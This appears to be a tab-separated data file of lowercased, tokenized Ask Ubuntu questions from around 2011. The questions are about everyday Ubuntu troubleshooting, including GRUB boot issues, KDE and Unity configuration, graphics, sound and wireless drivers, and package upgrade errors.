81237	how to pre-configure ( configure defaults for new users ) kde ?	i 'm trying to figure out how to configure kde for new users . that is : setting up kde and make these settings default for every user upon her first login . i know that there 's /etc/skel but it 's not working nicely because kde writes user- and machine-specific stuff in its users configuration files and i want this to work for every user on every machine . also modifying stuff in /usr/share seems wrong to me as well as stuff there could get overwritten by an update or - even worse - modifications there could make auto upgrade fail . so , is there a standard way of doing this ? thanks
81239	terminal line glitches	i installed ubuntu 11.10 mini + lxde and wanted to make my command line different in terminal ( than just plain white ) , so i added blue color to path line ( everything until $ sign ) and it works fine but i have two strange glitches now : when i write a line which is longer than terminal window , instead of starting at next line it starts at the same one , overwriting everything which was in there . sometimes while navigating over previous commands ( up/down arrow keys ) some part of command gets stuck and is treated as part of prompt ( the blue text ) , but it is white and is non-deletable and is not taken as part of command when i press enter . what could i mess up ? the bad thing is that i do n't remember what exactly did i change , but i 'm sure i changed only one line in bashrc edit : for anyone who is willing to customize terminal line , here 's a nice tutorial - > link < - . make sure you do n't miss any symbols ( especially '\ ' ones ) and everything works fine .
81243	could not calculate upgrade from maverick meerkat to natty narwhal	i upgraded from ubuntu lucid lynx to maverick meerkat with the following commands : sudo apt-get update & & sudo apt-get upgrade sudo apt-get install update-manager-core sudo vi /etc/update-manager/release-upgrades and changed the last line to prompt=normal sudo do-release-upgrade -d this upgrade was ok . i decided to repeat the same steps and to upgrade maverick meerkat to natty narwhal . it ended with this message : building data structures ... done calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : can not mark 'xubuntu-desktop ' for upgrade this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug against the 'update-manager ' package and include the files in /var/log/dist-upgrade/ in the bug report . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done === command detached from window ( mon nov 21 09:37:21 2011 ) === === command terminated with exit status 1 ( mon nov 21 09:37:21 2011 ) === how can i correct it ?
81245	how to use secure erase and is it on the install cd ?	supposedly there is some built in hard drive magic called `` secure erase '' which is wildly faster and more secure than `` dd if=/dev/zero ... '' i am most excited about the speed increase . there seems to be a gui for it as part of parted magic : http : //www.ocztechnologyforum.com/forum/showthread.php ? 81321-secure-erase-with-bootable-cd-usb-linux..-point-and-click-method is there something like this for ubuntu ? better yet , is there a way to actually issue this command `` manually '' like with smartctl or something ?
81247	what are the names of default indicators ( and of packages they belong to ) in ubuntu 11.10 ?	how are they called ? what packages do they belong to ? it is useful for configuring them via dconf , reporting bugs and so on but hard to find out . i remember there was similar question for 11:04 but can not find it . these are the indicators on my system : there are ten , the last one on the left is tomboy , the rest is more or less default ( the second from the left is displayed only if more than one keybord layout is used ) . what are their names ? and the names of their packages ?
81260	why the process priority of pulseaudio is -11 ?	why it so low ? sometime when cpu is high load sound through pulseaudio becomes choppy . i think this happens because process priority of pulseaudio has so low value . so why it so low by default if it can cause problems .
81263	how to i fix software center after installing the linux mint mate desktop ?	i installed the mate desktop using this manual but now i ca n't open my ubuntu software center and ca n't open the settings from the update manager . i removed mate desktop but it does n't fix the problem , i also reinstalled the software center , software-properties-gtk and software-properties-common using : sudo apt-get update ; sudo apt-get -- purge -- reinstall install software-center software-properties-common software-properties-gtk . but when using this line i get the following error : reading package lists ... done reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 3 reinstalled , 0 to remove and 0 not upgraded . need to get 0 b/735 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 304824 files and directories currently installed . ) preparing to replace software-center 5.0.2 ( using ... /software-center_5.0.2_all.deb ) ... unpacking replacement software-center ... preparing to replace software-properties-common 0.81.13.1 ( using ... /software-properties-common_0.81.13.1_all.deb ) ... unpacking replacement software-properties-common ... preparing to replace software-properties-gtk 0.81.13.1 ( using ... /software-properties-gtk_0.81.13.1_all.deb ) ... unpacking replacement software-properties-gtk ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... processing triggers for shared-mime-info ... unknown media type in type 'all/all ' unknown media type in type 'all/allfiles ' unknown media type in type 'uri/mms ' unknown media type in type 'uri/mmst ' unknown media type in type 'uri/mmsu ' unknown media type in type 'uri/pnm ' unknown media type in type 'uri/rtspt ' unknown media type in type 'uri/rtspu ' unknown media type in type 'interface/x-winamp-skin ' setting up software-center ( 5.0.2 ) ... traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 38 , in < module > from softwarecenter.db.update import rebuild_database file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 59 , in < module > from softwarecenter.db.database import parse_axi_values_file file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 26 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 25 , in < module > from softwarecenter.backend.channel import is_channel_available file `` /usr/share/software-center/softwarecenter/backend/channel.py '' , line 25 , in < module > from softwarecenter.distro import get_distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 165 , in < module > distro_instance=_get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 148 , in _get_distro module = __import__ ( distro_id , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linuxmint setting up software-properties-common ( 0.81.13.1 ) ... setting up software-properties-gtk ( 0.81.13.1 ) ... $ is there a way to fix this problem without having to reinstall ubuntu 11.10 ? ? thanks in advance tinuz
81265	mysql database in tasksel lamp stack for oscommerce	i 'm experimenting with oscommerce , an e-commerce suite , for which i installed the lamp stack using tasksel . it did ask for a `` root password '' for mysql , but other that that i did not pay attention to the installation procedure . now i 'm faced with the following screen , with no idea with what goes where : so my question is what are the default options , and how do i find all the details ?
81266	why is dockbarx so static ? could you make it more dynamic ?	i would like to see the dock acting dynamically . i would like ubuntu to put me , in the dock , the icons of programs that i use most frequently , in descending order of use . my computer , and all computer of the users around the world , would be customized to the specific use of the programs . each computer would have its unique and specific dock ! in addition to customized , the system would be operated more easily because we would have all the links available on the dock , quickly accessed with just one click . much faster and convenient ! thanks .
81267	problems with libreoffice impress ?	i am a big fan of ubuntu . i have recently switched from latex to libreoffice impress for ppt because it seems that with impress you can quickly create slides . i am using libreoffice 3.4.4 ooo340m1 ( build:402 ) on ubuntu 11.04 . i am saving them as .ppt format . however , facing the following problems . it is really frustrating and forcing me to use windows/mac just for making slides . font is changing from arial to timesnewroman specifically for tables when i reopen an impress presentation . tables are stretched if i reopen an impress presentation . impress is not allowing me to compress them ( the stretched tables ) and i have needed to make a fresh table . several other modifications are reverting back when i reopen an impress presentation . for example , the `` transparency '' change to the borders ( e.g. , for rectangular shape ) . arbitrarily impress is crashing . it would be great if someone help me to resolve these issues . thanks .
81275	mapping c : \ path	i have eclipse plug-in that was written under windows and uses `` c : \ '' a lot . is there any way to map `` c : \ '' to any chosen dir ? p.s . i do know i can run it under wine , but that is not what i want .
81283	no keyboard input until after grub	i have a computer that i dual boot between ubuntu 11.10 and windows 7 . i installed windows first , and ubuntu second . when i boot , the grub menu comes up , showing me the option to select to boot to ubuntu at the top of the list , and to boot to windows at the bottom . unfortunately , as far as i can tell , any key i press on the keyboard ( connected by usb ) does not get any response , so i ca n't actually select to boot to anything but ubuntu ( which is the default selection ) . once ubuntu loads and i am at the log in screen , then the keyboard ( and mouse ) work perfectly normally thereafter . why would my keyboard not work only during grub ? and how do i fix it ?
81285	eeepc 1018pb dual display wrong resolution size	my setup : eeepc 1018pb with intel gma 3150 . ubuntu 11.10 x64_86 samsung syncmaster 2333 the problem : i connect the samsung with the eeepc . ubuntu recognizes the display . when i try to activate it and set the native resolution ( 1920x1080 ) , i get the following error : the selected configuration for display could not be applied requested size ( 2944 , 1080 ) exceeds 3d hardware limit ( 2048 , 2048 ) ... note that the width is exactly 1024px larger than i selected . this offset is kept for any resolution i choose . if i choose a resolution with a width smaller than 1024 it applies exactly the selected resolution . so i guess the error occurs only during the `` error checking '' . which is a little bit funny . so basically i have no idea how to fix this . i searched for two days know without any usable result . i looked for new drivers , but i could n't find anything besides http : //intellinuxgraphics.org . but as i understood this drivers are already used by ubuntu natively . besides i have no idea how to install them by hand . jockey-gtk does n't even suggest graphic drivers .
81288	what do i multiply in this matrix calculation to configure my touchscreen ?	i use 2 displays ( 1920x1080 touchscreen on the left , 1440x900 on the right ) . if i ever use xinput set-prop `` acer t230h '' `` coordinate transformation matrix '' 0.566 0 0 0 .71111 0 0 0 1 ( as matrix value ) 0.566 0 0 0 0.71111 0 0 0 1 the x-coordinate is caluclated correctly , but the y-coordinate is must be multiplyed by ~1.2 to be correct . where do i have to place my 1.2 ?
81289	force a particular kernel for booting	at the moment i have a 3.1 kernel installed from elsewhere and the regular 3.0.12 ( upgraded to 3.0.13 today ) kernel from the repos . when booting up , grub will choose 3.1 by default . i want it to choose 3.0.12/13 by default . how can i make it do that ?
81291	restore grub - can not find file	i had ubuntu and win 7 on different partitions . and then i formatted partition which containing win 7 and reinstall win 7 . and then dual boot screen disappeared . i 'm following tohuwawohu 's answer . my hdd partition is sda5 which ubuntu installed . now i 'm trying to boot my computer , after bios loading , i 'm getting grub command prompt screen ( screenshot ) directly . to solve it , i 'm following this steps . result is like this :
81293	what is the command to update time and date from internet	what is the command to update time and date from internet . is there any application that allows me to do so graphically ?
81296	repeat key functionality does n't work	on logging into oneiric , my repeat key functionality does n't work . holding in a key will not repeat . i can work around this by going into system settings > > keyboard and slightly adjusting the delay and/or speed and then the repeat keys will work for that session only . shutting down and restarting again breaks the repeat keys . what can i do to fix this ?
81311	after moving my installation to a new computer , how can i have ubuntu redetect sound hardware ?	i want to move a working install of ubuntu from one computer to another by taking the hard drive out of the first and putting it into the second . everything seems to work except that i have no sound at all . apparently when using skype , the other person can hear me , so audio input works , but not output . sound was working just fine on the old computer , but after doing lspci | grep audio it appears that there is different audio hardware in the new computer . i know that ubuntu auto-detects hardware , and my hypothesis is that i need to have it redetect audio hardware . first of all , is this actually the case , and if so , how do i get ubuntu to do that ?
81315	apache directory studio cgi how to make it run on lubuntu ?	i am trying to make apache directory studio run on lubuntu ... directory.apache.org/studio/ some time ago i just download it unpaket it and run it ... all in ubuntu 8.10 . but now how can i do this ? if i double click on th e file nothing happens . in english `` apachedirectorystudio : ca n't execute the binary file ''
81318	remote desktop view ( krfb / vnc ) not updating on client	i am having a weird problem when running krfb ( kde remote desktop sharing ) . i can see the initial snapshot of the remote desktop after connecting , i can manipulate windows on the remote desktop with the mouse , but my view of the desktop does not change . it remains as the snapshot of the desktop from the moment i connected it . basically , it seems that gui updates are not correctly being transferred to the vnc client . this is regardless of which vnc client software i uses ( tightvnc , realvnc , etc ... ) - the behavior is the same . any help would be immensely appreciated , because i am completely lost as to why gui updates are not coming from the vnc server to the client .
81320	bluetooth daemon not running at startup	i 'm trying to connect a bluetooth mouse to my xubuntu system using blueman ( v. 1.21 ) problem seems to be bluetoothd not running at startup , so blueman refuses to start , only a dialog appears : `` bluez daemon is not running , blueman-manager can not continue . '' on my system , bluetoothd will run only as root ( sudo ) , so my current workaround is simply to sudo bluetoothd manually , which works fine but id like to have it run at startup so that my mouse is just working without any interaction from me , if possible . if i try to start bluetoothd as non-root it reports : bluetooth deamon 4.91 unable to get on d-bus in the startup scripts i found the same bluetoothd script in all runlevels and init.d : daemon=/usr/sbin/bluetoothd test -f /usr/sbin/bluetoothd || exit 0 # bluetoothd normally starts up by udev rules . it needs dbus to function , log_progress_msg `` bluetoothd '' pkill -term bluetoothd || true log_progress_msg `` bluetoothd '' i looked in /etc/udev/rules.d/ but no reference to bluetoothd . further i have already tried with no luck : editing /etc/dbus-1/system.d/bluetooth.conf to include my user ( essentially copying the part that was for root ) : i tried it while both keeping the root policy and without , still , no luck ! editing /etc/pam.d/common-session and /etc/pam.d/gdm to include the line : session optional pam_ck_connector.so in the case of common-session it was already there but with a `` nox11 '' which i tried removing . no luck no luck . btw , i 'm confused as to which session manager i 'm using , since i have both xfce4-session and gdm-session-worker running . anyways , hope someone is savvy enough to figure it out or bring some hints , otherwise i sincerely apologize for wasting your time ! i 'll sign off with uname -a : linux [ mycompname ] 3.0.0-9-lowlatency # 12ppa1~natty1-ubuntu smp preempt mon aug 22 06:52:15 utc 2011 x86_64 x86_64 x86_64 gnu/linux peace b )
81323	how to make thunderbird automatically check mail on login ?	how can i force thunderbird to automatically check mail when i log in ? i am using ubuntu 11.10 , 64-bit .
81325	choose 11.10 or 10.04 for file , and proxy servers ?	i 'm setting up 2 servers at a small school . wondering if i should use the latest version ( always my instinct ) or go with 10.04lts . 1 . file server : main file server single sign on with ldap and nfs probably kerberos . migrating users and their home dirs from a centos ( release 5-4el5 ) nis + nfs system . i might try to squeeze some life out of some aging pentium3s by running them as thin clients off this machine . 2 . proxy dns , dhcp , squid , dansguardian , cups print server . also one of these has to be nominated to do some samba sharing for our xerox docucentre iv to send scans to , as i ca n't seem to get it to work with ftp , but that is another story ... clients are mostly running older fedora versions , but most are going to be moved to current ubuntu or xubuntu , as hardware permits . laptop users have mixed oses and phones and ipads are all over the network . only going for single sign on for desktops at the moment . what are the pros and cons of choosing the latest os version over older versions ?
81326	`` never hide '' unity launcher via ccsm & gconf does n't work	all : i am running unity 3d and i want to set my launcher to never hide . i first ran ccsm , and set `` hide launcher '' to `` never '' . i rebooted then logged back in and it was still auto-hiding . i then ran gconf-editor , i navigated to /apps/compiz-1/plugins/unityshell/screen0/options and then set launcher_hide_mode to 0 . i again rebooted and logged back in . the launcher is still auto-hiding . checking gconf-editor , launcher_hide_mode is set to 0 , but this setting is n't active however . what can i do to get the launcher to never hide ? thanks , jim
81331	file permissions to let web application write files	i installed oscommerce using these instructions . during the initial run , i was asked to point at the mysql database it should use and set up admin accounts . but to save the settings , it needed to modify an existing file : the webserver was not able to write the installation parameters to its configuration file due to file permission problems . please verify the file permissions of the configuration file and try again by clicking on the retry button below . the configuration file is located at : /var/www/oscommerce/oscommerce/om/config/settings.ini what permission setting do i need to enable the web application to write , on what files , and how ? nb i can edit the file in question and save the settings manually , but to avoid issues in the future , i want to know how to let the web application run as it should .
81334	how do i unassociate executables with wine ?	i want to un-associate executables to open with wine , for security reasons i 'm using lubuntu 11.10 , how can i do this ?
81336	how do i modify the noacpi option ?	i am new to ubuntu and have started using it since a week . i installed ubuntu server 11.10 on a vm created using vmware player . once installed , i tried to install ubuntu desktop using sudo apt-get install -- no-install-recommends ubuntu-desktop now i am unable to boot and i get the following error *pulseaudio configured per-user session after this , nothing happens and the ubuntu server does not boot . i read in another q & a , the same problem and the solution . just installed a cli system then ubuntu-desktop , does not boot automatically my question is how to modify noacpi option . how do i get into the boot for the ubuntu server ? i have read on the net that by hitting the shift button , we can get into the boot options . i tried that , but no success , probably since i am running ubuntu on vmware player . please guide me on how to solve this problem
81339	not able to see icons on my desktop	i am not able to see icons on my desktop even when i have minimized all my windows . also i am unable to right-click on my desktop . i have installed ubuntu 11.10 on my vaio laptop . i am using unity 3d .
81340	do open source ( or amd 's ) drivers work well for hd5570 graphics card ?	do open source ( or amd 's ) drivers work well for hd5570 ? especially on ubuntu 11.10 i do n't have it but i want to buy so if anyone could tell me i would be greatful . thanks !
81341	install eclipse ide for java ee dev via apt-get . is it possible ?	i try install eclipse ide for java ee developers . i run in terminal this command : sudo apt-get install eclipse this ends successfully . but when i see it , is installed the eclipse classic version - not for java ee developers . so , this is my question : it is possible install eclipse ide for java ee dev via apt-get command ?
81344	how to fix error with ati driver `` error of failed request '' ?	i installed the fglrx catalyst proprietary driver via this link : http : //cisight.com/install-amd-radeon-hd-6470m-and-solve-overheat-on-ubuntu-1110-oneiric/ running fglrxinfo or glxinfo | grep render returns : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 my xorg is : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' load `` fglrx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection how may i solve it ?
81348	boot problem , keep on asking for the cd	i installed ubuntu 11.10 from a disk image cd to a clean ( no o/s ) hard drive but can not get it to boot from the hard drive although the boot sequence in the bios is for hdd-0 , floppy a , cd rom . it keep on asking for the cd to boot . can someone help please .
81349	how do i prevent an application from obscuring the launcher when it is maximized ?	i want to configure my unity desktop in oneiric so that : the launcher is never hidden . when i maximize an application , it fills the visible workspace except for the launcher and the panel . currently , when i get the launcher to `` never '' hide , and i maximize an application window , it `` hides under '' the launcher which requires me to manually resize it . is there a way for me to configure my desktop so that maximized windows don 'd `` hind under '' or `` obscure over '' my launcher ? thanks , jim
81356	kde scroll speed is not proportional to wheel speed	on kde , each click in the mouse wheel results in some distance going up and down . if i scroll faster or slower , the same shift in the viewport is achieved . is there some way to scroll more when i scroll faster , like it is on the mac ?
81359	where to apply these akonadi settings for mysql-server ?	i am using an external mysql-server to work with akonadi . ( using kde4 ) . now i could solve all problems with it , but i still have to apply some settings to the `` mysql-global.conf '' -file of the server . that 's what is suggested for example : # wait 365d before dropping the db connection ( default:8h ) wait_timeout=31536000 so i tried to change this setting via the mysql console . but it 's not reflected anywhere in the /etc/mysql/my.cnf file . ( etc/akonadi/mysql-global.conf seems to have no effect on the mysql-server either ! ) my question : where to put these ( or similar ) settings to apply them in a way that akonadi wo n't drop the connection with an external server ( globally i guess ? ) ?
81366	how do i change the os name in the boot menu ?	i have installed ubuntu 11.10 with wubi ( windows installer ) and when i boot my computer it gives me the option of windows 7 home premium and ubuntu . i want to change the name of ubuntu to windows 7 recovery module . any ideas ?
81368	how do you upgrade/remove a side-by-side installation ?	i 've hit some snags in the last two upgrades ( which i 've been able to resolve with time , patience and ask ubuntu : ) so come 12.04 i 'm considering a side-by-side installation . perhaps even installing a pre-release before that ( because virtual machine testing ca n't reveal hardware-related issues ) . so , let 's say i installed a side-by-side version . as far as i can tell this splits my existing partition and installs a brand new ubuntu on partition 2 . if all goes well , there are no hardware issues , and my favorite apps seem to be working , how do i switch to a one-sided installation ? if i ca n't , how do i do a side-by-side installation the next time ? ( and , am i crazy to consider using a pre-release version to do a side-by-side installation ? )
81370	how to create/extract the edid for/from a monitor	is it possible to create or extract the extended display identification data ( edid ) for/from a monitor . i have some issues with my monitor with the vga and hdmi cables and i would like to test if by adding the edid to the nvidia settings it could help in solve this issues . with the vga cable i get a black out error and with the hdmi i get some edid errors ( bad edid ) . so how can i create the edid or extract it from the monitor by detecting its capabilities .
81376	battery life is getting shorter and it longer to charge	just installed ubuntu on my laptop . what is weird is that my battery life has become shorter , and when i try to charge it , it said that my battery will be full in 8:30 hrs . while on my windows , it only take less than 2 hrs make it full . please help
81381	problems syncing photos and strange effects of uploaded files from other devices	i have a galaxy spica ( gt-i5700 ) android v2.1 , rooted with leshak dev 7 # 123 . but never mind the root info , the problem would be the same unrooted . the photos from this phone is stored in `` sdcard/images '' , nevertheless the phone also creates a `` sdcard/dcim '' but only stores some thumbnails there . problem nr 1 : u1 only reads the dcim-folder for automatic photo-upload . so photos stored in this phone is not uploaded . if i move photos to `` dcim '' folder , u1 recognises the photos and start uploading them . possible solution : could there be an option in the settings , to set preferred photo folder ? problem nr 2 : out of 74 pictures , 12 did not get uploaded . pressing `` retry failed transfers '' in settings does nothing . pressing the files where status is `` upload failed , tap to retry '' only changes the status to `` uploading ... '' but nothing gets uploaded . if i upload another file to u1 , it is uploaded directly without any problem . it has nothing to do with file size , 1,1 mb files has been uploaded fine whilst some failed are 0,8 mb . problem nr 3 : the photos from dcim are in my case uploaded to a folder called `` pictures - gt-i5700 '' in u1 . if i log in to the homepage and from there upload another photo in `` pictures - gt-i5700 '' , it shows up in u1 on my phone fine . but when i tap it , u1 downloads the photo to `` sdcard/u1/pictures - gt-i5700 '' . if it sync photos from `` sdcard/dcim '' to a specific folder , why not also download files to the same folder from which it is synced ? after a while of usage , syncing and uploading files from different clients it would be a mishmash of folders and places files are stored and considering that i see no use of u1 at all . another question : if my sd card in some way breaks down/some folders can not be read/card temporarly changed and u1 is running , does u1 consider that as files deleted and also delete from the cloud ?
81382	`` exec : 15 : update-grub : not found '' error when updating kernel	root @ me-desktop : ~ # sudo apt-get install aircrack-ng reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : aircrack-ng 0 upgraded , 1 newly installed , 0 to remove and 446 not upgraded . 1 not fully installed or removed . need to get 1,579kb of archives . after this operation , 2,843kb of additional disk space will be used . get:1 http : //archive.ubuntu.com/ubuntu/ maverick/universe aircrack-ng i386 1:1.1-1 [ 1,579kb ] fetched 1,579kb in 1min 9s ( 22.7kb/s ) selecting previously deselected package aircrack-ng . ( reading database ... 520739 files and directories currently installed . ) unpacking aircrack-ng ( from ... /aircrack-ng_1 % 3a1.1-1_i386.deb ) ... processing triggers for man-db ... setting up linux-image-3.0.1-030001-generic ( 3.0.1-030001.201108060905 ) ... running depmod . update-initramfs : generating /boot/initrd.img-3.0.1-030001-generic warning : no support for locale : en_us.utf8 examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.0.1-030001-generic /boot/vmlinuz-3.0.1-030001-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.0.1-030001-generic /boot/vmlinuz-3.0.1-030001-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 3.0.1-030001-generic /boot/vmlinuz-3.0.1-030001-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.0.1-030001-generic /boot/vmlinuz-3.0.1-030001-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.0.1-030001-generic /boot/vmlinuz-3.0.1-030001-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.0.1-030001-generic /boot/vmlinuz-3.0.1-030001-generic exec : 15 : update-grub : not found run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.0.1-030001-generic.postinst line 1010. dpkg : error processing linux-image-3.0.1-030001-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up aircrack-ng ( 1:1.1-1 ) ... errors were encountered while processing : linux-image-3.0.1-030001-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ me-desktop : ~ #
81383	how can i add new autostart programs in lubuntu ?	in lubuntu , there 's no 'add new program ... ' button in desktop session settings . is there an easy way to add new autostart programs in lubuntu ?
81386	unity account login without desktop environment	when i install glx-dock ( cairo-dock with opengl ) my unity desktop environment crashed and there is nothing except with the background image . i thought due to ccsm and also i had already install and runned avant window navigator . my others accounts like gnome and unity 2d runs as they were . how can i again make work unity .
81388	chromium broken - reduced to snail 's pace rendering multiple images ?	the upgrade to chromium 15 at the end of october appeared to break my browser , so i rolled back to chrome 14 , and that solved it - but today , that 's broken too . something else must be the cause . i 've tested two machines , various screens , visual effects on and off , even a fresh install of 11.10 ( i currently use 10.04 lts ) - all show the same problem in chrome and chromium . my specific situation involves a page of thumbnails ( where the thumbnail is actually the full image resized using width= and height= ) ; clicking the thumbnail makes the full size image appear in an iframe on the same page . previously this was instant , and the machine was immediately available for another click . now , the response to the first click is still instant , but there then follow several seconds of 100 % processor usage by chrome/chromium ( according to system monitor ) as it does goodness-only-knows-what , rendering the entire machine unusable for that period . clicking quickly through the thumbnails is therefore no longer possible . it used to work , and now it does n't ! this is n't supposed to happen ! has anyone experienced a similar change in behaviour in chrome/chromium ? anyone know the cause ? is there anywhere i can download an older chrome/chromium to try ? any other suggested solutions ? ... for example , another browser that properly scales down jpgs with a method better than firefox 's awful `` nearest neighbour '' method ?
81401	how do i `` connect to server '' in ubuntu 11.10 ?	in versions of ubuntu prior to 11.10 , the file manager had a `` connect to server '' menu item . is this functionality present in 11.10 ? i have used ubuntu for 6 years . i can not find it in 11.10 .
81403	numlock does n't work after logging in	i 've a strange problem after upgrading to ubuntu 11.10 the numlock of my apple keyboard ( white , wired ) does n't work anymore . strange thing because it works with the guest account but not with my user account . i did change the lightdm.conf to get the numlock working for the login and it works , but nor in my user account . even stranger , pushing zero effects a right click ? i also tried different keyboard layouts , but it shows numlock on ( stuck on ) but does n't work . any idea which config file stores information about this ?
81404	upgraded to the latest available kernel through update manager . messed up a lot of things . how do i fix them ?	well i upgraded to the latest kernel today ( not 3.2 , but the one available through update manager ) . firstly my video driver was ruined ( as expected ) and i had to reinstall it . next , the sound became laggy , i need a fix for that . my motherboard is intel dh67cl with it 's own sound card . how can i fix the laggy sound ?
81411	wifi does not start ( after suspend or pressing the off switch ) ; light blinks when connection is active	i have a hp compaq nx7300 and if i press the wifi button it stops , but if i press it again it wont start . it will start just if i suspend and after get out of suspension mode or if i restart the computer . btw , the led do n't stop blinking . in windows that 's not normal . my system is a hp compaq nx7300 can you help me with this issues , please ?
81412	screen flashes gray as i log in , can i stop it ?	since installing 11.10 i 've noticed that often when i login the following sequence : login screen [ hit enter ] light gray screen ( 0.5 - 1 sec ) my background appears unity loads guake loads i 'm running on a fairly beefy i7 so i do n't think it 's a lack of hardware , unless its that the intel card ca n't cope but the nvidia would . ( i 'm running one of those hybrid graphics machines . ) is there any way to stop this flash from happening ? can i change the color ? is it a bug ?
81414	unity launcher only runs once - requires lightdm restart before it runs again	i have an intermittent problem that just started showing up several days ago . i am running 11.10 and all updates are current . i first saw the symptom with a custom version of the `` home '' nautilus-home.desktop file i created in ~/.local.share/applications . i added a few static shortcuts to specific folders . what i found was , clikcing the icon once would open up my home folder , but after closing that nautilus window , clicking the icon again did nothing ( did not even show icon backlight animation ) . however , i could right click on the same icon and access my short cuts as many times as i want . symptom persisted until restarting lightdm . just yesterday i saw the same sort of symptom happen with a custom launcher i created for a chromium-borwser to open a specific url ( with a few short cuts to other urls ) . click the icon - it works once . then never again . right click the icon and i can use the short cuts over and over - no problem . note - at one point i assumed i might have a problem with my custom .desktop file , so i did a test by removing my custom nautilus-home.desktop . however , even after restarting lightdm , and verifying the home icon was the standard one from /opt/share/applications ( all my custom shortcuts were gone ) i saw the same symptom re-appear - it runs once and then not again until restarting lightdm . it seems to be intermittent and seems to move between various launchers . not sure what to do or even what background data to gather . attempt to improve question after the first answer : i tried the following : 1 ) remove all custom launchers 2 ) reboot 3 ) add custom lauchers back 4 ) reboot 5 ) attempt to use ... . still have `` runs once and never again '' symptom with several launchers
81417	open source alternatives to windows live writer	is there any open source software that can rival windows live writer
81424	i am tryng to dual-boot ubuntu 11.10 and fedora 16	i am going to dual-boot ubuntu 11.10 and fedora 16 . i am installing ubuntu first . partitioning 15 mb for boot partition , and the rest of my space divided by 2 for each ubuntu and fedora ( 500 gb each ) . i set the fedora partition not to be used by ubuntu . i am not using swap partition . after the installation , do i have to manually configure grub ? or will the fedora installer do the job for me ?
81425	installation `` sticks '' on acer aspire one zg5	sorry if i 'm doing this all wrong ; i am barely computer literate , stumbling through this rather ungracefully ... i have an acer aspire one which i threw in my closet a few months back when i got a new laptop ( birthday + spotty netbook internet connection + generous mom ) . unfortunately , i need it to work again , and when i opened it , it would not boot , saying simply `` error 17 . '' somebody suggested that i put ubuntu on it and see if it worked . never done anything like that before . i went to the ubuntu site and followed directions for putting the files on a flash drive . seemed to work initially : got a preliminary screen with the ubuntu logo asking what i wanted to do ( run ubuntu on the computer , burn to hard drive , etc. ) . however , after i chose ( i tried both of the first two ) , i got a long , rapidly moving list of commands or something ( ? ) in which the words `` device error , '' `` logic block '' and `` killing '' come up a lot ( i can be more specific ) . after a minute or two , a purple screen with blinking white/red dots and the ubuntu logo on it comes up ... and stays there . nothing else happens . i tried first with a flash drive , then a different flash drive , then a cd ( which did n't boot up anything at all and simply caused `` error 17 '' - may not have worked because the external cd drive does n't `` like '' my netbook ) . i tried first the 11.10 version , then the 10.04 version . all the same problem . no idea if i can fix this . any help ?
81426	can i play movies without x launched ?	i know that i dont need a gui for browsing internet ( using links ) but what about doing other things like playing movies , music and pictures slide shows . is it possible to do that in a text mode command line ?
81429	no wireless connection using a conceptronic c54i ( rt2561/rt61 rev b )	detected but not working . new install on ubuntu 11.10 using coneptronic c54ri . as documentation says it uses ralink drivers ... . any ideas why my wireless does not work ? $ lspci -nn | grep -i 'ralink' 01:05.0 network controller : ralink corp. rt2561/rt61 rev b 802.11g ifconfig eth0 link encap : ethernet hwaddr 00:1e:90 : e5 : af:13 inet addr:192.168.0.197 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:90ff : fee5 : af13/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:28361 errors:0 dropped:0 overruns:0 frame:0 tx packets:16858 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:39812172 ( 39.8 mb ) tx bytes:1633405 ( 1.6 mb ) interrupt:43 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:80 errors:0 dropped:0 overruns:0 frame:0 tx packets:80 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6608 ( 6.6 kb ) tx bytes:6608 ( 6.6 kb ) iwconfig wlan0 wlan0 ieee 802.11abg essidff/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thrff fragment thrff power managementff lsmod | grep rt rt61pci 27493 0 